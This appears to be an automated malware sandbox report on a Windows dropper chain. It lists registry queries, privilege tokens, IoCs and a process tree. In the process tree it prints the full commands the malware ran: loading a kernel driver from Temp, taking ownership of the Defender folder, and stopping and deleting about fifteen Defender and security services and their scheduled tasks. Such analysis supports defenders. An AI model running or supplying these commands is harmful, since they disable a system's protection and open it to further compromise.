Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5fa1f2042d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	13d55a37.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f73ae_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2dadc4a98b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f73ae_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d3d6a21859.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0047102a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 2 IoCs

pid	Process
432	timeout.exe
5760	timeout.exe

Kills process with taskkill 5 IoCs

pid	Process
11676	taskkill.exe
12768	taskkill.exe
6236	taskkill.exe
13024	taskkill.exe
13128	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
7200	schtasks.exe
9452	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3932	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
3932	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
2140	rapes.exe
2140	rapes.exe
4056	powershell.exe
4056	powershell.exe
4056	powershell.exe
6344	rapes.exe
6344	rapes.exe
7332	powershell.exe
7332	powershell.exe
7332	powershell.exe
8184	powershell.exe
8184	powershell.exe
8184	powershell.exe
8364	TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE
8364	TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE
8712	powershell.exe
8712	powershell.exe
8712	powershell.exe
9068	powershell.exe
9068	powershell.exe
9068	powershell.exe
5376	powershell.exe
5376	powershell.exe
5376	powershell.exe
9608	powershell.exe
9608	powershell.exe
9608	powershell.exe
10188	MSBuild.exe
10188	MSBuild.exe
10188	MSBuild.exe
10188	MSBuild.exe
10384	483d2fa8a0d53818306efeb32d3.exe
10384	483d2fa8a0d53818306efeb32d3.exe
10864	5d92038cff.exe
10864	5d92038cff.exe
10864	5d92038cff.exe
10864	5d92038cff.exe
10864	5d92038cff.exe
10864	5d92038cff.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
9680	8c1aa1e31d.exe
9680	8c1aa1e31d.exe
9680	8c1aa1e31d.exe
9680	8c1aa1e31d.exe
9680	8c1aa1e31d.exe
3164	rapes.exe
3164	rapes.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
10476	Passwords.com
10476	Passwords.com
10476	Passwords.com
10476	Passwords.com
10476	Passwords.com
10476	Passwords.com
10896	5fa1f2042d.exe
10896	5fa1f2042d.exe

Suspicious behavior: LoadsDriver 7 IoCs

pid	Process
660	Process not Found
660	Process not Found
5044	tzutil.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe
12524	0047102a.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
4308	f73ae_003.exe
4308	f73ae_003.exe
4308	f73ae_003.exe

Suspicious use of AdjustPrivilegeToken 55 IoCs

description	pid	Process
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	7332	powershell.exe
Token: SeLoadDriverPrivilege	5044	tzutil.exe
Token: SeDebugPrivilege	8184	powershell.exe
Token: SeDebugPrivilege	8712	powershell.exe
Token: SeDebugPrivilege	9068	powershell.exe
Token: SeDebugPrivilege	5376	powershell.exe
Token: SeDebugPrivilege	9608	powershell.exe
Token: SeDebugPrivilege	11676	taskkill.exe
Token: SeDebugPrivilege	12524	0047102a.exe
Token: SeBackupPrivilege	12524	0047102a.exe
Token: SeRestorePrivilege	12524	0047102a.exe
Token: SeLoadDriverPrivilege	12524	0047102a.exe
Token: SeShutdownPrivilege	12524	0047102a.exe
Token: SeSystemEnvironmentPrivilege	12524	0047102a.exe
Token: SeSecurityPrivilege	12524	0047102a.exe
Token: SeDebugPrivilege	12768	taskkill.exe
Token: SeDebugPrivilege	6236	taskkill.exe
Token: SeDebugPrivilege	13024	taskkill.exe
Token: SeDebugPrivilege	13128	taskkill.exe
Token: SeDebugPrivilege	13236	firefox.exe
Token: SeDebugPrivilege	13236	firefox.exe
Token: SeBackupPrivilege	12524	0047102a.exe
Token: SeRestorePrivilege	12524	0047102a.exe
Token: SeDebugPrivilege	12524	0047102a.exe
Token: SeSystemEnvironmentPrivilege	12524	0047102a.exe
Token: SeSecurityPrivilege	12524	0047102a.exe
Token: SeCreatePermanentPrivilege	12524	0047102a.exe
Token: SeShutdownPrivilege	12524	0047102a.exe
Token: SeLoadDriverPrivilege	12524	0047102a.exe
Token: SeIncreaseQuotaPrivilege	12524	0047102a.exe
Token: SeSecurityPrivilege	12524	0047102a.exe
Token: SeSystemProfilePrivilege	12524	0047102a.exe
Token: SeDebugPrivilege	12524	0047102a.exe
Token: SeMachineAccountPrivilege	12524	0047102a.exe
Token: SeCreateTokenPrivilege	12524	0047102a.exe
Token: SeAssignPrimaryTokenPrivilege	12524	0047102a.exe
Token: SeTcbPrivilege	12524	0047102a.exe
Token: SeAuditPrivilege	12524	0047102a.exe
Token: SeSystemEnvironmentPrivilege	12524	0047102a.exe
Token: SeDebugPrivilege	9680	8c1aa1e31d.exe
Token: SeLoadDriverPrivilege	12524	0047102a.exe
Token: SeLoadDriverPrivilege	12524	0047102a.exe
Token: SeIncreaseQuotaPrivilege	12524	0047102a.exe
Token: SeSecurityPrivilege	12524	0047102a.exe
Token: SeSystemProfilePrivilege	12524	0047102a.exe
Token: SeDebugPrivilege	12524	0047102a.exe
Token: SeMachineAccountPrivilege	12524	0047102a.exe
Token: SeCreateTokenPrivilege	12524	0047102a.exe
Token: SeAssignPrimaryTokenPrivilege	12524	0047102a.exe
Token: SeTcbPrivilege	12524	0047102a.exe
Token: SeAuditPrivilege	12524	0047102a.exe
Token: SeSystemEnvironmentPrivilege	12524	0047102a.exe
Token: SeDebugPrivilege	9420	tasklist.exe
Token: SeDebugPrivilege	9832	tasklist.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
3932	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
2416	d3d6a21859.exe
2416	d3d6a21859.exe
2416	d3d6a21859.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
13236	firefox.exe
11588	2dadc4a98b.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
11588	2dadc4a98b.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
10476	Passwords.com
10476	Passwords.com
10476	Passwords.com

Suspicious use of SendNotifyMessage 30 IoCs

pid	Process
2416	d3d6a21859.exe
2416	d3d6a21859.exe
2416	d3d6a21859.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
11588	2dadc4a98b.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
13236	firefox.exe
11588	2dadc4a98b.exe
11588	2dadc4a98b.exe
10476	Passwords.com
10476	Passwords.com
10476	Passwords.com

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
13236	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3932 wrote to memory of 2140	3932	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe	93
PID 3932 wrote to memory of 2140	3932	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe	93
PID 3932 wrote to memory of 2140	3932	61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe	93
PID 2140 wrote to memory of 1300	2140	rapes.exe	99
PID 2140 wrote to memory of 1300	2140	rapes.exe	99
PID 2140 wrote to memory of 1300	2140	rapes.exe	99
PID 1300 wrote to memory of 2164	1300	apple.exe	100
PID 1300 wrote to memory of 2164	1300	apple.exe	100
PID 1300 wrote to memory of 2164	1300	apple.exe	100
PID 2164 wrote to memory of 5744	2164	11.exe	102
PID 2164 wrote to memory of 5744	2164	11.exe	102
PID 5744 wrote to memory of 2644	5744	cmd.exe	104
PID 5744 wrote to memory of 2644	5744	cmd.exe	104
PID 5744 wrote to memory of 2644	5744	cmd.exe	104
PID 2644 wrote to memory of 6020	2644	11.exe	105
PID 2644 wrote to memory of 6020	2644	11.exe	105
PID 6020 wrote to memory of 3100	6020	cmd.exe	107
PID 6020 wrote to memory of 3100	6020	cmd.exe	107
PID 6020 wrote to memory of 3360	6020	cmd.exe	108
PID 6020 wrote to memory of 3360	6020	cmd.exe	108
PID 6020 wrote to memory of 432	6020	cmd.exe	109
PID 6020 wrote to memory of 432	6020	cmd.exe	109
PID 6020 wrote to memory of 3052	6020	cmd.exe	110
PID 6020 wrote to memory of 3052	6020	cmd.exe	110
PID 6020 wrote to memory of 4052	6020	cmd.exe	111
PID 6020 wrote to memory of 4052	6020	cmd.exe	111
PID 6020 wrote to memory of 3236	6020	cmd.exe	112
PID 6020 wrote to memory of 3236	6020	cmd.exe	112
PID 6020 wrote to memory of 5372	6020	cmd.exe	113
PID 6020 wrote to memory of 5372	6020	cmd.exe	113
PID 6020 wrote to memory of 3600	6020	cmd.exe	114
PID 6020 wrote to memory of 3600	6020	cmd.exe	114
PID 6020 wrote to memory of 644	6020	cmd.exe	115
PID 6020 wrote to memory of 644	6020	cmd.exe	115
PID 6020 wrote to memory of 3096	6020	cmd.exe	116
PID 6020 wrote to memory of 3096	6020	cmd.exe	116
PID 6020 wrote to memory of 5464	6020	cmd.exe	117
PID 6020 wrote to memory of 5464	6020	cmd.exe	117
PID 6020 wrote to memory of 2496	6020	cmd.exe	118
PID 6020 wrote to memory of 2496	6020	cmd.exe	118
PID 6020 wrote to memory of 4664	6020	cmd.exe	119
PID 6020 wrote to memory of 4664	6020	cmd.exe	119
PID 6020 wrote to memory of 6060	6020	cmd.exe	120
PID 6020 wrote to memory of 6060	6020	cmd.exe	120
PID 6020 wrote to memory of 3992	6020	cmd.exe	121
PID 6020 wrote to memory of 3992	6020	cmd.exe	121
PID 6020 wrote to memory of 2016	6020	cmd.exe	122
PID 6020 wrote to memory of 2016	6020	cmd.exe	122
PID 6020 wrote to memory of 4112	6020	cmd.exe	123
PID 6020 wrote to memory of 4112	6020	cmd.exe	123
PID 6020 wrote to memory of 5388	6020	cmd.exe	124
PID 6020 wrote to memory of 5388	6020	cmd.exe	124
PID 6020 wrote to memory of 1620	6020	cmd.exe	125
PID 6020 wrote to memory of 1620	6020	cmd.exe	125
PID 6020 wrote to memory of 5932	6020	cmd.exe	126
PID 6020 wrote to memory of 5932	6020	cmd.exe	126
PID 6020 wrote to memory of 1992	6020	cmd.exe	127
PID 6020 wrote to memory of 1992	6020	cmd.exe	127
PID 6020 wrote to memory of 3448	6020	cmd.exe	129
PID 6020 wrote to memory of 3448	6020	cmd.exe	129
PID 6020 wrote to memory of 4660	6020	cmd.exe	130
PID 6020 wrote to memory of 4660	6020	cmd.exe	130
PID 6020 wrote to memory of 5560	6020	cmd.exe	131
PID 6020 wrote to memory of 5560	6020	cmd.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
"C:\Users\Admin\AppData\Local\Temp\61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3932
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2140
- - C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe
    "C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1300
  - - C:\Users\Admin\AppData\Local\Temp\11.exe
      "C:\Users\Admin\AppData\Local\Temp\11.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2164
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B026.tmp\B027.tmp\B028.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5744
      - C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2644
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B17D.tmp\B17E.tmp\B17F.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
        7⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:6020
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        8⤵
        Launches sc.exe
        
        PID:3100
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:3360
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        Delays execution with timeout.exe
        
        PID:432
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:3052
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:4052
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3236
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5372
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:3600
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:644
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        8⤵
        
        PID:3096
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:5464
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:2496
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        8⤵
        
        PID:4664
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:6060
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:3992
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        8⤵
        
        PID:2016
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        8⤵
        Launches sc.exe
        
        PID:4112
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        8⤵
        Launches sc.exe
        
        PID:5388
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        8⤵
        
        PID:1620
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:5932
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:1992
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        8⤵
        Modifies security service
        
        PID:3448
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:4660
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:5560
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        8⤵
        
        PID:1364
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:2696
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:4012
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        8⤵
        
        PID:4036
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:5316
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:5380
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        8⤵
        
        PID:3220
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:6128
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:5588
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        8⤵
        
        PID:5872
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:5532
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:2236
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        8⤵
        
        PID:1352
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:5224
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:5288
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        8⤵
        
        PID:396
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:436
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:5248
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        8⤵
        
        PID:5684
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:2332
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:1904
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        8⤵
        
        PID:3012
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:2812
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:3008
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        8⤵
        
        PID:6024
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:2136
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:2416
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        8⤵
        
        PID:4200
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:1592
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:5264
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        8⤵
        
        PID:5908
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        8⤵
        
        PID:2564
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        8⤵
        
        PID:1552
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        8⤵
        
        PID:5804
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        8⤵
        
        PID:532
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:4000
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        8⤵
        Launches sc.exe
        
        PID:1296
- - C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe
